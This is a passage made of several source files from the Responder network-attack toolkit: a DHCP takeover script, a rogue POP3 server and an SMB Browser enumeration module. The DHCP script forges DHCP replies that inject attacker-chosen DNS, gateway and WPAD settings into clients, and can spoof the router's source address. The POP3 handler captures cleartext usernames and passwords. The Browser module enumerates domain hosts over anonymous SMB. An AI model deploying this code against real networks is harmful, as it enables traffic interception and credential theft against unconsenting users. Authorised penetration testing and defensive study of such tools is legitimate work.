s.sendto('\x02',('255.255.255.255',1434))

try:
	# Collect replies until the 2-second timeout fires; the timeout exception
	# is swallowed by the bare except below, ending the scan.
	while 1:
		data, address = s.recvfrom(8092)
		if not data:
			break
		else:
			print "==============================================================="
			print "Host details:",address[0]
			# Skip the 3-byte SSRP response header, print the info string.
			print data[2:]
			print "==============================================================="
			print ""
except:
	pass
| 1,299 | Python | .py | 35 | 33.742857 | 80 | 0.644956 | SpiderLabs/Responder | 4,450 | 1,663 | 44 | GPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,397 | DHCP.py | SpiderLabs_Responder/tools/DHCP.py | #!/usr/bin/env python
# This file is part of Responder
# Original work by Laurent Gaffie - Trustwave Holdings
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import sys
import struct
import optparse
import ConfigParser
import os
BASEDIR = os.path.realpath(os.path.join(os.path.dirname(__file__), '..'))
sys.path.insert(0, BASEDIR)
from odict import OrderedDict
from packets import Packet
from utils import *
# Command-line interface: capture interface, the DNS/router/WPAD values to
# hand out in forged DHCP answers, and flags controlling source-IP spoofing
# and whether to answer DHCP Request/Discover (not just Inform).
parser = optparse.OptionParser(usage='python %prog -I eth0 -d pwned.com -p 10.20.30.40 -s 10.20.30.1 -r 10.20.40.1', prog=sys.argv[0],)
parser.add_option('-I', '--interface', action="store", help="Interface name to use, example: eth0", metavar="eth0",dest="Interface")
parser.add_option('-d', '--dnsname', action="store", help="DNS name to inject, if you don't want to inject a DNS server, provide the original one.", metavar="pwned.com", default="pwned.com",dest="DNSNAME")
parser.add_option('-r', '--router', action="store", help="The ip address of the router or yours if you want to intercept traffic.", metavar="10.20.1.1",dest="RouterIP")
parser.add_option('-p', '--primary', action="store", help="The ip address of the original primary DNS server or yours", metavar="10.20.1.10",dest="DNSIP")
parser.add_option('-s', '--secondary', action="store", help="The ip address of the original secondary DNS server or yours", metavar="10.20.1.11",dest="DNSIP2")
parser.add_option('-n', '--netmask', action="store", help="The netmask of this network", metavar="255.255.255.0", default="255.255.255.0", dest="Netmask")
parser.add_option('-w', '--wpadserver', action="store", help="Your WPAD server string", metavar="\"http://wpadsrv/wpad.dat\"", default="", dest="WPAD")
parser.add_option('-S', action="store_true", help="Spoof the router ip address",dest="Spoof")
parser.add_option('-R', action="store_true", help="Respond to DHCP Requests, inject linux clients (very noisy, this is sent on 255.255.255.255)", dest="Respond_To_Requests")

options, args = parser.parse_args()
def color(txt, code = 1, modifier = 0):
	"""Wrap *txt* in an ANSI escape sequence: 3<code> selects the foreground
	colour (1=red, 2=green, ...) and *modifier* the attribute (1=bold)."""
	return "\033[{0};3{1}m{2}\033[0m".format(modifier, code, txt)
# Validate mandatory options up front; exit with an actionable message when
# one is missing (-I interface, -r router, -p/-s primary/secondary DNS).
if options.Interface is None:
	print color("[!]", 1, 1), "-I mandatory option is missing, please provide an interface."
	exit(-1)
elif options.RouterIP is None:
	print color("[!]", 1, 1), "-r mandatory option is missing, please provide the router's IP."
	exit(-1)
elif options.DNSIP is None:
	print color("[!]", 1, 1), "-p mandatory option is missing, please provide the primary DNS server ip address or yours."
	exit(-1)
elif options.DNSIP2 is None:
	print color("[!]", 1, 1), "-s mandatory option is missing, please provide the secondary DNS server ip address or yours."
	exit(-1)
print '#############################################################################'
print '## DHCP INFORM TAKEOVER 0.2 ##'
print '## ##'
print '## By default, this script will only inject a new DNS/WPAD ##'
print '## server to a Windows <= XP/2003 machine. ##'
print '## ##'
print '## To inject a DNS server/domain/route on a Windows >= Vista and ##'
print '## any linux box, use -R (can be noisy) ##'
print '## ##'
print '## Use `RespondTo` setting in Responder.conf for in-scope targets only. ##'
print '#############################################################################'
print ''
print color('[*]', 2, 1), 'Listening for events...'

# Load the in-scope / out-of-scope target lists from Responder.conf.
config = ConfigParser.ConfigParser()
config.read(os.path.join(BASEDIR,'Responder.conf'))
RespondTo = filter(None, [x.upper().strip() for x in config.get('Responder Core', 'RespondTo').strip().split(',')])
DontRespondTo = filter(None, [x.upper().strip() for x in config.get('Responder Core', 'DontRespondTo').strip().split(',')])

# Resolve CLI options into the module globals the packet builders read.
Interface = options.Interface
Responder_IP = FindLocalIP(Interface)
ROUTERIP = options.RouterIP
NETMASK = options.Netmask
DHCPSERVER = Responder_IP
DNSIP = options.DNSIP
DNSIP2 = options.DNSIP2
DNSNAME = options.DNSNAME
# NOTE(review): "\\n" appends the two literal characters backslash+n (not a
# newline) to the WPAD string — presumably intentional for the DHCP option
# payload; confirm against consumers of option 252.
WPADSRV = options.WPAD.strip() + "\\n"
Spoof = options.Spoof
Respond_To_Requests = options.Respond_To_Requests

# When spoofing, impersonate the router as the DHCP server identity too.
if Spoof:
	DHCPSERVER = ROUTERIP
##### IP Header #####
class IPHead(Packet):
	# Minimal IPv4 header template for the hand-built replies. The checksum
	# is left zero: for IPPROTO_RAW sockets the kernel fills it in.
	fields = OrderedDict([
		("Version", "\x45"),	# version 4, IHL 5 (20-byte header)
		("DiffServices", "\x00"),
		("TotalLen", "\x00\x00"),	# NOTE(review): never recomputed; kernel fixes it for raw sockets
		("Ident", "\x00\x00"),
		("Flags", "\x00\x00"),
		("TTL", "\x40"),	# 64
		("Protocol", "\x11"),	# 0x11 = UDP
		("Checksum", "\x00\x00"),
		("SrcIP", ""),
		("DstIP", ""),
	])
class UDP(Packet):
	# UDP header template: src 0x0043 = 67 (DHCP server), dst 0x0044 = 68
	# (DHCP client). Checksum left zero — optional over IPv4.
	fields = OrderedDict([
		("SrcPort", "\x00\x43"),
		("DstPort", "\x00\x44"),
		("Len", "\x00\x00"),
		("Checksum", "\x00\x00"),
		("Data", "\x00\x00"),
	])

	def calculate(self):
		# UDP Length = 8-byte header + payload length.
		self.fields["Len"] = struct.pack(">h",len(str(self.fields["Data"]))+8)
class DHCPACK(Packet):
	# Full BOOTP reply used to answer DHCP Request/Discover. DHCPOpCode is
	# option 53's value: \x05 = ACK by default, overridden to \x02 (Offer)
	# by the Discover branch in ParseDHCPCode. calculate() injects the
	# attacker-controlled netmask/router/DNS/WPAD options from the globals.
	fields = OrderedDict([
		("MessType", "\x02"),	# BOOTREPLY
		("HdwType", "\x01"),	# Ethernet
		("HdwLen", "\x06"),
		("Hops", "\x00"),
		("Tid", "\x11\x22\x33\x44"),
		("ElapsedSec", "\x00\x00"),
		("BootpFlags", "\x00\x00"),
		("ActualClientIP", "\x00\x00\x00\x00"),
		("GiveClientIP", "\x00\x00\x00\x00"),
		("NextServerIP", "\x00\x00\x00\x00"),
		("RelayAgentIP", "\x00\x00\x00\x00"),
		("ClientMac", "\xff\xff\xff\xff\xff\xff"),
		("ClientMacPadding", "\x00" *10),
		("ServerHostname", "\x00" * 64),
		("BootFileName", "\x00" * 128),
		("MagicCookie", "\x63\x82\x53\x63"),
		("DHCPCode", "\x35"), #DHCP Message
		("DHCPCodeLen", "\x01"),
		("DHCPOpCode", "\x05"), #Msgtype(ACK)
		("Op54", "\x36"),
		("Op54Len", "\x04"),
		("Op54Str", ""), #DHCP Server
		("Op51", "\x33"),
		("Op51Len", "\x04"),
		("Op51Str", "\x00\x01\x51\x80"), #Lease time, 1 day
		("Op1", "\x01"),
		("Op1Len", "\x04"),
		("Op1Str", ""), #Netmask
		("Op15", "\x0f"),
		("Op15Len", "\x0e"),
		("Op15Str", ""), #DNS Name
		("Op3", "\x03"),
		("Op3Len", "\x04"),
		("Op3Str", ""), #Router
		("Op6", "\x06"),
		("Op6Len", "\x08"),
		("Op6Str", ""), #DNS Servers
		("Op252", "\xfc"),
		("Op252Len", "\x04"),
		("Op252Str", ""), #Wpad Server
		("Op255", "\xff"),
		("Padding", "\x00"),
	])

	def calculate(self):
		# Fill the variable options from the script globals, then recompute
		# the two variable-length option sizes (domain name, WPAD string).
		self.fields["Op54Str"] = socket.inet_aton(DHCPSERVER)
		self.fields["Op1Str"] = socket.inet_aton(NETMASK)
		self.fields["Op3Str"] = socket.inet_aton(ROUTERIP)
		self.fields["Op6Str"] = socket.inet_aton(DNSIP)+socket.inet_aton(DNSIP2)
		self.fields["Op15Str"] = DNSNAME
		self.fields["Op252Str"] = WPADSRV
		self.fields["Op15Len"] = struct.pack(">b",len(str(self.fields["Op15Str"])))
		self.fields["Op252Len"] = struct.pack(">b",len(str(self.fields["Op252Str"])))
class DHCPInformACK(Packet):
	# BOOTP ACK answering a DHCP Inform (option 53 hard-coded to \x05 in
	# Op53). Same poisoned options as DHCPACK but without a lease time —
	# Inform clients keep their address and only take configuration.
	fields = OrderedDict([
		("MessType", "\x02"),	# BOOTREPLY
		("HdwType", "\x01"),	# Ethernet
		("HdwLen", "\x06"),
		("Hops", "\x00"),
		("Tid", "\x11\x22\x33\x44"),
		("ElapsedSec", "\x00\x00"),
		("BootpFlags", "\x00\x00"),
		("ActualClientIP", "\x00\x00\x00\x00"),
		("GiveClientIP", "\x00\x00\x00\x00"),
		("NextServerIP", "\x00\x00\x00\x00"),
		("RelayAgentIP", "\x00\x00\x00\x00"),
		("ClientMac", "\xff\xff\xff\xff\xff\xff"),
		("ClientMacPadding", "\x00" *10),
		("ServerHostname", "\x00" * 64),
		("BootFileName", "\x00" * 128),
		("MagicCookie", "\x63\x82\x53\x63"),
		("Op53", "\x35\x01\x05"), #Msgtype(ACK)
		("Op54", "\x36"),
		("Op54Len", "\x04"),
		("Op54Str", ""), #DHCP Server
		("Op1", "\x01"),
		("Op1Len", "\x04"),
		("Op1Str", ""), #Netmask
		("Op15", "\x0f"),
		("Op15Len", "\x0e"),
		("Op15Str", ""), #DNS Name
		("Op3", "\x03"),
		("Op3Len", "\x04"),
		("Op3Str", ""), #Router
		("Op6", "\x06"),
		("Op6Len", "\x08"),
		("Op6Str", ""), #DNS Servers
		("Op252", "\xfc"),
		("Op252Len", "\x04"),
		("Op252Str", ""), #Wpad Server.
		("Op255", "\xff"),
	])

	def calculate(self):
		# Inject server identity, netmask, router, DNS and WPAD values from
		# the globals; recompute the variable-length option sizes.
		self.fields["Op54Str"] = socket.inet_aton(DHCPSERVER)
		self.fields["Op1Str"] = socket.inet_aton(NETMASK)
		self.fields["Op3Str"] = socket.inet_aton(ROUTERIP)
		self.fields["Op6Str"] = socket.inet_aton(DNSIP)+socket.inet_aton(DNSIP2)
		self.fields["Op15Str"] = DNSNAME
		self.fields["Op252Str"] = WPADSRV
		self.fields["Op15Len"] = struct.pack(">b",len(str(self.fields["Op15Str"])))
		self.fields["Op252Len"] = struct.pack(">b",len(str(self.fields["Op252Str"])))
def SpoofIP(Spoof):
	"""Source IP for outgoing replies: the router's address when spoofing
	is enabled, otherwise our own."""
	if Spoof:
		return ROUTERIP
	return Responder_IP
def RespondToThisIP(ClientIp):
	"""Scope filter: True only when *ClientIp* is not loopback, passes the
	RespondTo whitelist (empty list = everyone) and is absent from the
	DontRespondTo blacklist."""
	# Guard clauses replace the original if/elif ladder; each test mirrors
	# the original condition exactly.
	if ClientIp.startswith('127.0.0.'):
		return False
	if RespondTo and ClientIp not in RespondTo:
		return False
	if ClientIp in RespondTo or RespondTo == []:
		return ClientIp not in DontRespondTo
	return False
def ParseSrcDSTAddr(data):
	"""Extract (src IP, src port, dst IP, dst port) from a sniffed Ethernet
	frame tuple as returned by recvfrom on a raw socket (IPv4 assumed:
	IPs at bytes 26-34, UDP ports at 34-38)."""
	frame = data[0]
	src_ip = socket.inet_ntoa(frame[26:30])
	dst_ip = socket.inet_ntoa(frame[30:34])
	src_port, dst_port = struct.unpack('>HH', frame[34:38])
	return src_ip, src_port, dst_ip, dst_port
def FindIP(data):
	"""Return the 4-byte requested-IP value of DHCP option 50 (0x32, len 4)
	found in *data*, or '' when the option is absent.

	Fix: the original pattern '(?<=\\x32\\x04)[^EOF]*' stopped at any byte
	equal to 'E' (0x45), 'O' (0x4f) or 'F' (0x46), so addresses containing
	those octets were truncated — and the caller could then pass fewer than
	4 bytes to socket.inet_ntoa. Capture exactly the 4 option bytes instead
	(DOTALL so 0x0a etc. also match)."""
	Match = re.search(b'\x32\x04(....)', data, re.DOTALL)
	return Match.group(1) if Match else ''
def ParseDHCPCode(data):
	"""Parse a sniffed BOOTP/DHCP payload (Ethernet/IP/UDP headers already
	stripped by the caller) and answer Inform / Request / Discover messages
	with poisoned replies. Returns a log string, or None when nothing was
	sent (unknown message type, out-of-scope client, or no IP found)."""
	PTid = data[4:8]	# BOOTP transaction id, echoed back
	Seconds = data[8:10]	# elapsed-seconds field, echoed back
	CurrentIP = socket.inet_ntoa(data[12:16])	# ciaddr
	RequestedIP = socket.inet_ntoa(data[16:20])	# yiaddr
	MacAddr = data[28:34]
	MacAddrStr = ':'.join('%02x' % ord(m) for m in MacAddr).upper()
	# NOTE(review): fixed offsets assume option 53 is the first option after
	# the 240-byte BOOTP header — true for common clients; confirm.
	OpCode = data[242:243]
	RequestIP = data[245:249]	# NOTE(review): unused; FindIP re-extracts it
	# DHCP Inform
	if OpCode == "\x08":
		# Unicast a poisoned ACK straight back to the client's current IP.
		IP_Header = IPHead(SrcIP = socket.inet_aton(SpoofIP(Spoof)), DstIP=socket.inet_aton(CurrentIP))
		Packet = DHCPInformACK(Tid=PTid, ClientMac=MacAddr, ActualClientIP=socket.inet_aton(CurrentIP),
			GiveClientIP=socket.inet_aton("0.0.0.0"),
			NextServerIP=socket.inet_aton("0.0.0.0"),
			RelayAgentIP=socket.inet_aton("0.0.0.0"),
			ElapsedSec=Seconds)
		Packet.calculate()
		Buffer = UDP(Data = Packet)
		Buffer.calculate()
		SendDHCP(str(IP_Header)+str(Buffer), (CurrentIP, 68))
		return 'Acknowledged DHCP Inform for IP: %s, Req IP: %s, MAC: %s Tid: %s' % (CurrentIP, RequestedIP, MacAddrStr, '0x'+PTid.encode('hex'))
	elif OpCode == "\x03" and Respond_To_Requests: # DHCP Request
		# ACK the address the client asked for (option 50), scope-checked.
		IP = FindIP(data)
		if IP:
			IPConv = socket.inet_ntoa(IP)
			if RespondToThisIP(IPConv):
				IP_Header = IPHead(SrcIP = socket.inet_aton(SpoofIP(Spoof)), DstIP=IP)
				Packet = DHCPACK(Tid=PTid, ClientMac=MacAddr, GiveClientIP=IP, ElapsedSec=Seconds)
				Packet.calculate()
				Buffer = UDP(Data = Packet)
				Buffer.calculate()
				SendDHCP(str(IP_Header)+str(Buffer), (IPConv, 68))
				return 'Acknowledged DHCP Request for IP: %s, Req IP: %s, MAC: %s Tid: %s' % (CurrentIP, RequestedIP, MacAddrStr, '0x'+PTid.encode('hex'))
	elif OpCode == "\x01" and Respond_To_Requests: # DHCP Discover
		# Same as Request but reply with an Offer (option 53 = \x02).
		IP = FindIP(data)
		if IP:
			IPConv = socket.inet_ntoa(IP)
			if RespondToThisIP(IPConv):
				IP_Header = IPHead(SrcIP = socket.inet_aton(SpoofIP(Spoof)), DstIP=IP)
				Packet = DHCPACK(Tid=PTid, ClientMac=MacAddr, GiveClientIP=IP, DHCPOpCode="\x02", ElapsedSec=Seconds)
				Packet.calculate()
				Buffer = UDP(Data = Packet)
				Buffer.calculate()
				SendDHCP(str(IP_Header)+str(Buffer), (IPConv, 0))
				return 'Acknowledged DHCP Discover for IP: %s, Req IP: %s, MAC: %s Tid: %s' % (CurrentIP, RequestedIP, MacAddrStr, '0x'+PTid.encode('hex'))
def SendDHCP(packet,Host):
	"""Send a raw, pre-built IP+UDP datagram (*packet*) to *Host*.

	Fix: the raw socket was never closed — one descriptor leaked per
	transmitted answer; close it in a finally block."""
	s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW)
	try:
		s.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
		s.sendto(packet, Host)
	finally:
		s.close()
if __name__ == "__main__":
	# Raw AF_PACKET sniffer bound to the chosen interface, IPv4 only
	# (ethertype 0x0800). Requires root.
	s = socket.socket(socket.PF_PACKET, socket.SOCK_RAW)
	s.bind((Interface, 0x0800))
	while True:
		try:
			data = s.recvfrom(65535)
			if data[0][23:24] == "\x11": # is udp?
				SrcIP, SrcPort, DstIP, DstPort = ParseSrcDSTAddr(data)
				# Only DHCP server-port traffic is interesting.
				if SrcPort == 67 or DstPort == 67:
					# Strip 14-byte Ethernet + 20-byte IP + 8-byte UDP headers.
					ret = ParseDHCPCode(data[0][42:])
					if ret:
						print text("[DHCP] %s" % ret)
		except KeyboardInterrupt:
			sys.exit("\r%s Exiting..." % color('[*]', 2, 1))
| 13,751 | Python | .py | 291 | 44.649485 | 213 | 0.571875 | SpiderLabs/Responder | 4,450 | 1,663 | 44 | GPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,398 | POP3.py | SpiderLabs_Responder/servers/POP3.py | #!/usr/bin/env python
# This file is part of Responder
# Original work by Laurent Gaffie - Trustwave Holdings
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from utils import *
from SocketServer import BaseRequestHandler
from packets import POPOKPacket
# POP3 Server class
class POP3(BaseRequestHandler):
	"""Rogue POP3 server: answers every client command with "+OK" and
	harvests the cleartext USER/PASS credentials the client volunteers."""
	def SendPacketAndRead(self):
		# Send a canned "+OK" response, then return the client's next line.
		Packet = POPOKPacket()
		self.request.send(str(Packet))
		return self.request.recv(1024)

	def handle(self):
		try:
			data = self.SendPacketAndRead()
			if data[0:4] == "USER":
				User = data[5:].replace("\r\n","")
				data = self.SendPacketAndRead()
				if data[0:4] == "PASS":
					Pass = data[5:].replace("\r\n","")
					# Record the captured cleartext credential pair.
					SaveToDb({
						'module': 'POP3',
						'type': 'Cleartext',
						'client': self.client_address[0],
						'user': User,
						'cleartext': Pass,
						'fullhash': User+":"+Pass,
					})
				# One final +OK so the client completes the exchange.
				self.SendPacketAndRead()
		except Exception:
			pass
21,399 | Browser.py | SpiderLabs_Responder/servers/Browser.py | #!/usr/bin/env python
# This file is part of Responder
# Original work by Laurent Gaffie - Trustwave Holdings
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from packets import SMBHeader, SMBNegoData, SMBSessionData, SMBTreeConnectData, RAPNetServerEnum3Data, SMBTransRAPData
from SocketServer import BaseRequestHandler
from utils import *
import struct
def WorkstationFingerPrint(data):
	"""Translate the 2-byte OS major/minor version field of a Browser
	announcement into a readable Windows version name ('Unknown' when
	the value is not recognized)."""
	known_versions = (
		("\x04\x00", "Windows 95"),
		("\x04\x10", "Windows 98"),
		("\x04\x90", "Windows ME"),
		("\x05\x00", "Windows 2000"),
		("\x05\x01", "Windows XP"),
		("\x05\x02", "Windows XP(64-Bit)/Windows 2003"),
		("\x06\x00", "Windows Vista/Server 2008"),
		("\x06\x01", "Windows 7/Server 2008R2"),
		("\x06\x02", "Windows 8/Server 2012"),
		("\x06\x03", "Windows 8.1/Server 2012R2"),
		("\x10\x00", "Windows 10/Server 2016"),
	)
	for version_bytes, label in known_versions:
		if data == version_bytes:
			return label
	return 'Unknown'
def RequestType(data):
	"""Translate a one-byte Browser protocol command code into its
	protocol name ('Unknown' for unrecognized codes)."""
	commands = {
		"\x01": 'Host Announcement',
		"\x02": 'Request Announcement',
		"\x08": 'Browser Election',
		"\x09": 'Get Backup List Request',
		"\x0a": 'Get Backup List Response',
		"\x0b": 'Become Backup Browser',
		"\x0c": 'Domain/Workgroup Announcement',
		"\x0d": 'Master Announcement',
		"\x0e": 'Reset Browser State Announcement',
		"\x0f": 'Local Master Announcement',
	}
	try:
		return commands[data]
	except KeyError:
		return 'Unknown'
def PrintServerName(data, entries):
	"""Decode *entries* RAP NetServerEnum SERVER_INFO_101 records from
	*data* into a list of 'NAME (OS version)' strings.

	Returns None when there are no entries. Each record is 26 bytes:
	16-byte NUL-padded name, 2-byte OS version, 8 bytes unused here.

	Fix: the original computed the stride as entrieslen/entries, which
	true-divides to a float under Python 3 and breaks range(); the stride
	is the constant record size, so use 26 directly (behavior under
	Python 2 is unchanged)."""
	if entries <= 0:
		return None
	RecordSize = 26
	Records = data[:RecordSize * entries]
	l = []
	for i in range(0, len(Records), RecordSize):
		x = Records[i:i + RecordSize]
		fingerprint = WorkstationFingerPrint(x[16:18])
		name = x[:16].replace('\x00', '')
		l.append('%s (%s)' % (name, fingerprint))
	return l
def ParsePacket(Payload):
	"""Locate the RAP reply inside an SMB Trans response and, when its
	status word is success (0x0000), decode the server entries via
	PrintServerName. Returns None on a non-zero status."""
	PayloadOffset = struct.unpack('<H', Payload[51:53])[0]
	status = Payload[PayloadOffset - 4:PayloadOffset - 2]
	if status != "\x00\x00":
		return None
	EntriesNum = struct.unpack('<H', Payload[PayloadOffset:PayloadOffset + 2])[0]
	return PrintServerName(Payload[PayloadOffset + 4:], EntriesNum)
def RAPThisDomain(Client,Domain):
	# Enumerate *Domain* through three RAP NetServerEnum calls against
	# *Client*, varying the server-type mask: domain list, SQL servers,
	# then all workstations/servers. Prints findings; returns None.
	PDC = RapFinger(Client,Domain,"\x00\x00\x00\x80")	# SV_TYPE_DOMAIN_ENUM
	if PDC is not None:
		print text("[LANMAN] Detected Domains: %s" % ', '.join(PDC))
	SQL = RapFinger(Client,Domain,"\x04\x00\x00\x00")	# SQL server flag
	if SQL is not None:
		print text("[LANMAN] Detected SQL Servers on domain %s: %s" % (Domain, ', '.join(SQL)))
	WKST = RapFinger(Client,Domain,"\xff\xff\xff\xff")	# all server types
	if WKST is not None:
		print text("[LANMAN] Detected Workstations/Servers on domain %s: %s" % (Domain, ', '.join(WKST)))
def RapFinger(Host, Domain, Type):
	# Anonymous SMB1 session to Host:445 that issues a RAP NetServerEnum3
	# for *Domain* filtered by the 4-byte server-*Type* mask. Returns the
	# decoded server list, or None on any failure (errors are swallowed;
	# the socket is only closed on the full success path).
	try:
		s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
		s.connect((Host,445))
		s.settimeout(0.3)
		# SMB_COM_NEGOTIATE.
		Header = SMBHeader(cmd="\x72",mid="\x01\x00")
		Body = SMBNegoData()
		Body.calculate()
		Packet = str(Header)+str(Body)
		# 4-byte NetBIOS session header (length) precedes each SMB message.
		Buffer = struct.pack(">i", len(''.join(Packet))) + Packet
		s.send(Buffer)
		data = s.recv(1024)
		# Session Setup AndX Request, Anonymous.
		if data[8:10] == "\x72\x00":
			Header = SMBHeader(cmd="\x73",mid="\x02\x00")
			Body = SMBSessionData()
			Body.calculate()
			Packet = str(Header)+str(Body)
			Buffer = struct.pack(">i", len(''.join(Packet))) + Packet
			s.send(Buffer)
			data = s.recv(1024)
			# Tree Connect IPC$.
			if data[8:10] == "\x73\x00":
				# Reuse the UID the server just assigned (data[32:34]).
				Header = SMBHeader(cmd="\x75",flag1="\x08", flag2="\x01\x00",uid=data[32:34],mid="\x03\x00")
				Body = SMBTreeConnectData(Path="\\\\"+Host+"\\IPC$")
				Body.calculate()
				Packet = str(Header)+str(Body)
				Buffer = struct.pack(">i", len(''.join(Packet))) + Packet
				s.send(Buffer)
				data = s.recv(1024)
				# Rap ServerEnum.
				if data[8:10] == "\x75\x00":
					Header = SMBHeader(cmd="\x25",flag1="\x08", flag2="\x01\xc8",uid=data[32:34],tid=data[28:30],pid=data[30:32],mid="\x04\x00")
					Body = SMBTransRAPData(Data=RAPNetServerEnum3Data(ServerType=Type,DetailLevel="\x01\x00",TargetDomain=Domain))
					Body.calculate()
					Packet = str(Header)+str(Body)
					Buffer = struct.pack(">i", len(''.join(Packet))) + Packet
					s.send(Buffer)
					data = s.recv(64736)
					# Rap ServerEnum, Get answer and return what we're looking for.
					if data[8:10] == "\x25\x00":
						s.close()
						return ParsePacket(data)
	except:
		pass
def BecomeBackup(data,Client):
	# Analyze-mode inspection of a Browser datagram: when it is a
	# "Become Backup Browser" request, report the sender and enumerate
	# its domain via RAP. Errors are silently ignored.
	try:
		DataOffset = struct.unpack('<H',data[139:141])[0]
		BrowserPacket = data[82+DataOffset:]
		ReqType = RequestType(BrowserPacket[0])
		if ReqType == "Become Backup Browser":
			ServerName = BrowserPacket[1:]
			Domain = Decode_Name(data[49:81])
			Name = Decode_Name(data[15:47])
			Role = NBT_NS_Role(data[45:48])
			if settings.Config.AnalyzeMode:
				print text("[Analyze mode: Browser] Datagram Request from IP: %s hostname: %s via the: %s wants to become a Local Master Browser Backup on this domain: %s."%(Client, Name,Role,Domain))
				# NOTE(review): RAPThisDomain returns None, so this prints a
				# trailing "None" after its own output — probably unintended.
				print RAPThisDomain(Client, Domain)
	except:
		pass
def ParseDatagramNBTNames(data,Client):
try:
Domain = Decode_Name(data[49:81])
Name = Decode_Name(data[15:47])
Role1 = NBT_NS_Role(data[45:48])
Role2 = NBT_NS_Role(data[79:82])
if Role2 == "Domain Controller" or Role2 == "Browser Election" or Role2 == "Local Master Browser" and settings.Config.AnalyzeMode:
print text('[Analyze mode: Browser] Datagram Request from IP: %s hostname: %s via the: %s to: %s. Service: %s' % (Client, Name, Role1, Domain, Role2))
print RAPThisDomain(Client, Domain)
except:
pass
class Browser(BaseRequestHandler):
	"""UDP/138 Browser datagram handler used by Responder's analyze mode.
	Errors are swallowed so a malformed datagram never kills the server."""
	def handle(self):
		try:
			request, socket = self.request
			if settings.Config.AnalyzeMode:
				ParseDatagramNBTNames(request,self.client_address[0])
			# Fix: BecomeBackup was invoked twice back to back (duplicated
			# line), doubling the analyze-mode processing and output.
			BecomeBackup(request,self.client_address[0])
		except Exception:
			pass